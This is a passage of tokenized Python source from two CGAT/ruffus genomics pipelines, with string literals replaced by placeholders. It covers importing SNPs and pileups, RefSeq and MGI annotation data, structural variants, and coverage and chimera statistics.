True ) <EOL> statement = m . build ( ( fastq , ) , outfile ) <EOL> P . run ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( ALIGNMENTS , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def linkAlignmentFiles ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( [ linkAlignmentFiles , mapReadsWithBwaAgainstExpectedContigs ] , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def buildChimerasBasedOnReads ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , <EOL> "<STR_LIT>" , infiles = infile , outfiles = outfile ) <EOL> @ merge ( buildChimerasBasedOnReads , "<STR_LIT>" ) <EOL> def mergeChimeras ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ transform ( buildChimerasBasedOnReads , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadChimericityScores ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ transform ( linkAlignmentFiles , suffix ( "<STR_LIT>" ) , add_inputs ( glob . glob ( "<STR_LIT>" ) ) , "<STR_LIT>" ) <EOL> def buildUniformityOfCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> bam = infiles [ <NUM_LIT:0> ] <EOL> track = P . snip ( os . path . basename ( bam ) , "<STR_LIT>" ) <EOL> tmp_bed = P . getTempFilename ( "<STR_LIT:.>" ) + "<STR_LIT>" <EOL> tmp_bam = P . getTempFilename ( "<STR_LIT:.>" ) + "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> for infs in infiles [ <NUM_LIT:1> : ] : <EOL> for inf in infs : <EOL> if P . snip ( inf , "<STR_LIT>" ) == track : <EOL> length_file = inf <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmp_bed ) <EOL> os . unlink ( tmp_bam ) <EOL> @ follows ( taxonomy , loadExpectedAndObservedGenomeCoverage , loadChimericityScores ) <EOL> def full ( ) : <EOL> pass <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> def build_report ( ) : <EOL> '''<STR_LIT>''' <EOL> E . info ( "<STR_LIT>" ) <EOL> P . run_report ( clean = True ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> def update_report ( ) : <EOL> '''<STR_LIT>''' <EOL> E . info ( "<STR_LIT>" ) <EOL> P . run_report ( clean = False ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( P . main ( sys . argv ) ) </s>
<s> """<STR_LIT>""" <EOL> from ruffus import * <EOL> import sys <EOL> import glob <EOL> import gzip <EOL> import os <EOL> import itertools <EOL> import CGAT . CSV as CSV <EOL> import re <EOL> import math <EOL> import types <EOL> import collections <EOL> import time <EOL> import optparse <EOL> import shutil <EOL> import numpy <EOL> import sqlite3 <EOL> import CGAT . GFF as GFF <EOL> import CGAT . GTF as GTF <EOL> import CGAT . Experiment as E <EOL> import CGAT . Pipeline as P <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . Genomics as Genomics <EOL> import CGAT . Database as Database <EOL> import CGAT . FastaIterator as FastaIterator <EOL> import PipelineGeneset as PGeneset <EOL> import PipelineEnrichment as PEnrichment <EOL> import PipelineGO as PGO <EOL> import PipelineBiomart as PBiomart <EOL> import PipelineDatabase as PDatabase <EOL> import scipy . stats <EOL> import CGAT . Stats as Stats <EOL> import pysam <EOL> import rpy2 <EOL> from rpy2 . robjects import r as R <EOL> P . getParameters ( <EOL> [ "<STR_LIT>" % os . path . splitext ( __file__ ) [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> P . PARAMS . update ( <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' } ) <EOL> PARAMS = P . PARAMS <EOL> if os . path . exists ( "<STR_LIT>" ) : <EOL> execfile ( "<STR_LIT>" ) <EOL> SEPARATOR = "<STR_LIT:|>" <EOL> if PARAMS [ "<STR_LIT>" ] : <EOL> @ split ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def importSNPs ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outfiles = IOTools . FilePool ( "<STR_LIT>" ) <EOL> inf = gzip . open ( infile , "<STR_LIT:r>" ) <EOL> headers = [ ] <EOL> counts = E . Counter ( ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> intervals = GTF . readAndIndex ( GTF . iterator ( IOTools . openFile ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT:r>" ) ) ) <EOL> else : <EOL> intervals = None <EOL> for line in inf : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if line . startswith ( "<STR_LIT:#>" ) : <EOL> if not headers : headers = data [ <NUM_LIT:3> : ] <EOL> continue <EOL> counts . input += <NUM_LIT:1> <EOL> contig , pos , ref = data [ : <NUM_LIT:3> ] <EOL> pos = int ( pos ) <EOL> if intervals : <EOL> if not intervals . contains ( "<STR_LIT>" % contig , pos - <NUM_LIT:1> , pos ) : <EOL> counts . filter += <NUM_LIT:1> <EOL> continue <EOL> for h , genotype in zip ( headers , data [ <NUM_LIT:3> : ] ) : <EOL> if genotype == "<STR_LIT:..>" : continue <EOL> outfiles . write ( h , <EOL> "<STR_LIT:\t>" . join ( map ( str , ( <EOL> contig , <EOL> pos , <EOL> ref , <EOL> Genomics . encodeGenotype ( genotype ) , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> genotype , <EOL> "<STR_LIT:<>" * len ( genotype ) ) ) ) + "<STR_LIT:\n>" ) <EOL> counts . output += <NUM_LIT:1> <EOL> outfiles . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> E . info ( "<STR_LIT>" ) <EOL> outfiles = glob . glob ( "<STR_LIT>" ) <EOL> for outfile in outfiles : <EOL> E . info ( "<STR_LIT>" % outfile ) <EOL> pysam . tabix_index ( outfile , preset = "<STR_LIT>" ) <EOL> elif PARAMS [ "<STR_LIT>" ] : <EOL> pass <EOL> elif PARAMS [ "<STR_LIT>" ] : <EOL> @ split ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def buildPileups ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outfiles = IOTools . FilePool ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> def _defdict ( ) : return collections . defaultdict ( list ) <EOL> filter_snps = collections . defaultdict ( _defdict ) <EOL> x = <NUM_LIT:0> <EOL> for line in IOTools . openFile ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT:r>" ) : <EOL> if line . startswith ( "<STR_LIT>" ) : continue <EOL> if line . startswith ( "<STR_LIT:#>" ) : continue <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> track , contig , pos = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] , int ( data [ <NUM_LIT:2> ] ) <EOL> track = track [ len ( "<STR_LIT>" ) : ] <EOL> filter_snps [ track ] [ contig ] . append ( pos ) <EOL> x += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" % x ) <EOL> else : <EOL> filter_snps = None <EOL> if "<STR_LIT>" in PARAMS : <EOL> E . info ( "<STR_LIT>" ) <EOL> intervals = GTF . readAndIndex ( GTF . iterator ( IOTools . openFile ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT:r>" ) ) ) <EOL> E . info ( "<STR_LIT>" ) <EOL> else : <EOL> intervals = None <EOL> inf = gzip . open ( infile , "<STR_LIT:r>" ) <EOL> headers = [ ] <EOL> ninput = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> for line in inf : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> if not headers : headers = data [ <NUM_LIT:9> : ] <EOL> continue <EOL> elif line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> contig , pos , ref = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] , data [ <NUM_LIT:3> ] <EOL> pos = int ( pos ) <EOL> variants = [ ref ] <EOL> variants . extend ( data [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) ) <EOL> counts . input += <NUM_LIT:1> <EOL> contig = "<STR_LIT>" % contig <EOL> if intervals : <EOL> if not intervals . contains ( contig , pos - <NUM_LIT:1> , pos ) : <EOL> counts . filter += <NUM_LIT:1> <EOL> continue <EOL> for h , genotype_info in zip ( headers , data [ <NUM_LIT:9> : ] ) : <EOL> if genotype_info == "<STR_LIT:.>" or genotype_info . startswith ( "<STR_LIT>" ) : continue <EOL> consensus_quality , genotype_quality , read_depth = "<STR_LIT:0>" , "<STR_LIT:0>" , "<STR_LIT:0>" <EOL> dd = genotype_info . split ( "<STR_LIT::>" ) <EOL> if len ( dd ) == <NUM_LIT:5> : <EOL> genotype , mapping_quality , hcg , genotype_quality , read_depth = dd <EOL> if hcg != "<STR_LIT:1>" : continue <EOL> elif len ( dd ) == <NUM_LIT:4> : <EOL> genotype , mapping_quality , genotype_quality , read_depth = dd <EOL> elif len ( dd ) == <NUM_LIT:2> : <EOL> genotype , genotype_quality = dd <EOL> elif len ( dd ) == <NUM_LIT:1> : <EOL> genotype = dd [ <NUM_LIT:0> ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( genotype_info , line ) ) <EOL> genotype = genotype . split ( "<STR_LIT:/>" ) <EOL> if filter_snps : <EOL> if pos - <NUM_LIT:1> in filter_snps [ h ] [ contig ] : <EOL> counts . filtered_snps += <NUM_LIT:1> <EOL> continue <EOL> if len ( set ( genotype ) ) != <NUM_LIT:1> : continue <EOL> genotype = [ variants [ int ( x ) ] for x in genotype ] <EOL> lengths = [ len ( x ) for x in genotype ] + [ len ( ref ) ] <EOL> is_snp = len ( set ( lengths ) ) == <NUM_LIT:1> and lengths [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> if "<STR_LIT:.>" in genotype : continue <EOL> if is_snp : <EOL> genotype = "<STR_LIT>" . join ( genotype ) <EOL> if genotype == "<STR_LIT>" % ( ref , ref ) : <EOL> continue <EOL> outfiles . write ( h , <EOL> "<STR_LIT:\t>" . join ( map ( str , ( <EOL> contig , <EOL> pos , <EOL> ref , <EOL> Genomics . encodeGenotype ( genotype ) , <EOL> consensus_quality , <EOL> genotype_quality , <EOL> mapping_quality , <EOL> read_depth , <EOL> genotype , <EOL> "<STR_LIT:<>" * len ( genotype ) ) ) ) + "<STR_LIT:\n>" ) <EOL> else : <EOL> def getPrefix ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> n = min ( len ( s1 ) , len ( s2 ) ) <EOL> predix = [ ] <EOL> for x in range ( n ) : <EOL> if s1 [ x ] != s2 [ x ] : return s1 [ : x ] <EOL> return s1 [ : n ] <EOL> def getSuffix ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> n = min ( len ( s1 ) , len ( s2 ) ) <EOL> predix = [ ] <EOL> if s1 [ - <NUM_LIT:1> ] != s2 [ - <NUM_LIT:1> ] : return "<STR_LIT>" <EOL> for x in range ( - <NUM_LIT:2> , - n - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> if s1 [ x ] != s2 [ x ] : return s1 [ x + <NUM_LIT:1> : ] <EOL> return s1 [ - n : ] <EOL> def getGenotype ( variant , ref ) : <EOL> if variant == ref : return "<STR_LIT:*>" , <NUM_LIT:0> <EOL> if len ( ref ) > len ( variant ) : <EOL> if ref . startswith ( variant ) : <EOL> return "<STR_LIT>" % ref [ len ( variant ) : ] , len ( variant ) - <NUM_LIT:1> <EOL> elif ref . endswith ( variant ) : <EOL> return "<STR_LIT>" % ref [ : - len ( variant ) ] , - <NUM_LIT:1> <EOL> else : <EOL> prefix = getPrefix ( ref , variant ) <EOL> suffix = getSuffix ( ref , variant ) <EOL> shared = len ( prefix ) + len ( suffix ) - len ( variant ) <EOL> if shared < <NUM_LIT:0> : <EOL> raise ValueError ( ) <EOL> return "<STR_LIT>" % ref [ len ( prefix ) : - ( len ( suffix ) - shared ) ] , len ( prefix ) - <NUM_LIT:1> <EOL> elif len ( ref ) < len ( variant ) : <EOL> if variant . startswith ( ref ) : <EOL> return "<STR_LIT>" % variant [ len ( ref ) : ] , len ( ref ) - <NUM_LIT:1> <EOL> elif variant . endswith ( ref ) : <EOL> return "<STR_LIT>" % variant [ : len ( ref ) ] , <NUM_LIT:0> <EOL> else : <EOL> prefix = getPrefix ( ref , variant ) <EOL> suffix = getSuffix ( ref , variant ) <EOL> shared = len ( prefix ) + len ( suffix ) - len ( ref ) <EOL> if shared < <NUM_LIT:0> : <EOL> raise ValueError ( ) <EOL> return "<STR_LIT>" % variant [ len ( prefix ) : - ( len ( suffix ) - shared ) ] , len ( prefix ) <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" <EOL> genotypes , offsets = [ ] , [ ] <EOL> is_error = True <EOL> for variant in genotype : <EOL> try : <EOL> g , offset = getGenotype ( variant , ref ) <EOL> except ValueError : <EOL> break <EOL> assert len ( g ) > <NUM_LIT:1> , "<STR_LIT>" % g <EOL> genotypes . append ( g ) <EOL> offsets . append ( offset ) <EOL> else : <EOL> is_error = False <EOL> if is_error : <EOL> print line , <EOL> counts . errors += <NUM_LIT:1> <EOL> continue <EOL> assert len ( set ( offsets ) ) == <NUM_LIT:1> <EOL> offset = offsets [ <NUM_LIT:0> ] <EOL> genotypes = "<STR_LIT:/>" . join ( genotypes ) <EOL> outfiles . write ( h , <EOL> "<STR_LIT:\t>" . join ( map ( str , ( <EOL> contig , <EOL> pos + offset , <EOL> "<STR_LIT:*>" , <EOL> genotypes , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> genotypes , <EOL> "<STR_LIT:<>" * len ( genotype ) , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" , <EOL> "<STR_LIT:0>" ) ) ) + "<STR_LIT:\n>" ) <EOL> counts . output += <NUM_LIT:1> <EOL> outfiles . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> @ transform ( buildPileups , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def indexPileups ( infile , outfile ) : <EOL> E . info ( "<STR_LIT>" % infile ) <EOL> statement = "<STR_LIT>" <EOL> P . run ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if os . path . exists ( outfile ) : <EOL> os . remove ( outfile ) <EOL> E . info ( "<STR_LIT>" % infile ) <EOL> pysam . tabix_index ( infile , preset = "<STR_LIT>" ) <EOL> @ follows ( indexPileups ) <EOL> def importSNPs ( ) : pass <EOL> @ jobs_limit ( <NUM_LIT:2> ) <EOL> @ transform ( "<STR_LIT>" , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPileup ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = False <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> else : <EOL> @ merge ( "<STR_LIT>" , None ) <EOL> def buildPileups ( ) : pass <EOL> @ transform ( buildPileups , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def countPileups ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> @ split ( ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> ) , <EOL> ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] ) ) <EOL> def importRefseq ( infiles , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> infile_gtf , infile_pep , infile_cdna , infile_map , infile_ensembl = infiles <EOL> outfile_gtf , outfile_pep , outfile_cdna = outfiles <EOL> tmpfilename1 = P . getTempFilename ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> tmpfilename2 = P . getTempFilename ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> if not os . path . exists ( outfile_gtf ) : <EOL> P . run ( ) <EOL> for infile , outfile in ( ( infile_pep , outfile_pep ) , <EOL> ( infile_cdna , outfile_cdna ) ) : <EOL> statement = '''<STR_LIT>''' <EOL> if not os . path . exists ( outfile ) : <EOL> P . run ( ) <EOL> table = "<STR_LIT>" <EOL> if <NUM_LIT:0> : <EOL> outf = open ( tmpfilename1 , "<STR_LIT:w>" ) <EOL> reader = CSV . DictReader ( IOTools . openFile ( infile_ensembl ) , dialect = "<STR_LIT>" ) <EOL> c = E . Counter ( ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for row in reader : <EOL> c . input += <NUM_LIT:1> <EOL> gene_id , transcript_id , refseq_transcript_id , refseq_protein_id , ccds_id = [ x . strip ( ) for x in <EOL> ( row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> row [ "<STR_LIT>" ] , <EOL> ) ] <EOL> if not ( transcript_id and gene_id and refseq_transcript_id and refseq_protein_id ) : <EOL> c . skipped += <NUM_LIT:1> <EOL> continue <EOL> c . output += <NUM_LIT:1> <EOL> outf . write ( "<STR_LIT>" % <EOL> ( gene_id , transcript_id , refseq_transcript_id , refseq_protein_id , ccds_id ) ) <EOL> outf . close ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( c ) ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmpfilename1 ) <EOL> os . unlink ( tmpfilename2 ) <EOL> if "<STR_LIT>" in PARAMS : <EOL> @ split ( ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> ) , <EOL> ( PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> PARAMS [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" ) ) <EOL> def importRefseqFromUCSC ( infiles , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> infile_gtf , infile_pep , infile_cdna , infile_map = infiles <EOL> outfile_gtf , outfile_pep , outfile_cdna , outfile_load = outfiles <EOL> if not os . path . exists ( outfile_gtf ) : <EOL> PGeneset . importRefSeqFromUCSC ( infile_gtf , outfile_gtf , remove_duplicates = True ) <EOL> for infile , outfile in ( ( infile_pep , outfile_pep ) , <EOL> ( infile_cdna , outfile_cdna ) ) : <EOL> statement = '''<STR_LIT>''' <EOL> if not os . path . exists ( outfile ) : <EOL> P . run ( ) <EOL> @ files ( "<STR_LIT>" % PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" % PARAMS [ "<STR_LIT>" ] ) <EOL> def indexGenome ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> pysam . faidx ( outfile ) <EOL> map_synonym2strains = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> @ active_if ( "<STR_LIT>" in PARAMS ) <EOL> @ split ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def importSVs ( infile , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> statement = "<STR_LIT>" <EOL> P . run ( ) <EOL> c = E . Counter ( ) <EOL> for infile in glob . glob ( "<STR_LIT>" ) : <EOL> c . nfiles += <NUM_LIT:1> <EOL> dirname , basename = os . path . split ( infile ) <EOL> track = re . sub ( "<STR_LIT>" , "<STR_LIT>" , basename ) . upper ( ) <EOL> if track in map_synonym2strains : <EOL> track = map_synonym2strains [ track ] <EOL> outfile = "<STR_LIT>" % track <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> os . unlink ( infile ) <EOL> E . info ( "<STR_LIT>" % outfile ) <EOL> os . unlink ( "<STR_LIT>" ) <EOL> E . info ( "<STR_LIT:%s>" % c ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def importPseudogenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tmpfile = "<STR_LIT>" <EOL> if not os . path . exists ( tmpfile + "<STR_LIT>" ) : <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> P . run ( ) <EOL> tablename = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def importMGI ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> filename = "<STR_LIT>" <EOL> if False : <EOL> R . library ( "<STR_LIT>" ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> keys = columns . keys ( ) <EOL> mgi = R . useMart ( biomart = "<STR_LIT>" , dataset = "<STR_LIT>" ) <EOL> result = R . getBM ( attributes = keys , mart = mgi ) <EOL> outf = open ( filename , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( [ columns [ x ] for x in keys ] ) + "<STR_LIT:\n>" ) <EOL> for data in zip ( * [ result [ x ] for x in keys ] ) : <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , data ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> if not os . path . exists ( filename ) : <EOL> R . library ( "<STR_LIT>" ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> def downloadData ( filename , columns ) : <EOL> '''<STR_LIT>''' <EOL> if os . path . exists ( filename ) : return <EOL> E . info ( "<STR_LIT>" % filename ) <EOL> keys = columns . keys ( ) <EOL> mgi = R . useMart ( biomart = "<STR_LIT>" , dataset = "<STR_LIT>" ) <EOL> result = R . getBM ( attributes = keys , <EOL> mart = mgi ) <EOL> if len ( result [ keys [ <NUM_LIT:0> ] ] ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" % ( filename , keys ) ) <EOL> outf = open ( filename , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( [ columns [ x ] for x in keys ] ) + "<STR_LIT:\n>" ) <EOL> for data in zip ( * [ result [ x ] for x in keys ] ) : <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , data ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:name>" , <EOL> "<STR_LIT>" : "<STR_LIT:type>" , <EOL> } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:name>" , <EOL> "<STR_LIT>" : "<STR_LIT:type>" <EOL> } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> for filename in glob . glob ( "<STR_LIT>" ) : <EOL> tablename = filename [ : - len ( "<STR_LIT>" ) ] <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def importMGIPhenotypesViaReports ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> mgi_dir = "<STR_LIT>" <EOL> if not os . path . exists ( mgi_dir ) : <EOL> os . mkdir ( mgi_dir ) <EOL> conversion = ( <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , None , None , None , None ) , <EOL> "<STR_LIT>" : "<STR_LIT:U+0020>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , None , None , None , None , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT:U+0020>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , None , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , None , None , None , None ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , None , None , None , None , <EOL> None , None , None , None , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:description>" , ) , <EOL> "<STR_LIT>" : None } , <EOL> ) <EOL> for filename in [ x [ "<STR_LIT:filename>" ] for x in conversion ] : <EOL> target = os . path . join ( mgi_dir , filename ) <EOL> if os . path . exists ( target ) : continue <EOL> E . info ( "<STR_LIT>" % filename ) <EOL> statement = "<STR_LIT>" <EOL> P . run ( ) <EOL> for convert in conversion : <EOL> tablename = convert [ "<STR_LIT>" ] <EOL> tmpfile = P . getTempFile ( "<STR_LIT:.>" ) <EOL> headers , take = [ ] , [ ] <EOL> for x , c in enumerate ( convert [ "<STR_LIT>" ] ) : <EOL> if c != None : <EOL> headers . append ( c ) <EOL> take . append ( x ) <EOL> tmpfile . write ( "<STR_LIT:\t>" . join ( headers ) + "<STR_LIT:\n>" ) <EOL> for line in open ( os . path . join ( mgi_dir , convert [ "<STR_LIT:filename>" ] ) ) : <EOL> if line . startswith ( "<STR_LIT:#>" ) : continue <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> tmpfile . write ( "<STR_LIT:\t>" . join ( [ data [ x ] . strip ( ) for x in take ] ) + "<STR_LIT:\n>" ) <EOL> tmpfile . close ( ) <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> separator = convert . get ( "<STR_LIT>" , "<STR_LIT:U+002C>" ) <EOL> tmpfilename = tmpfile . name <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmpfilename ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadGene2Omim ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> data = PBiomart 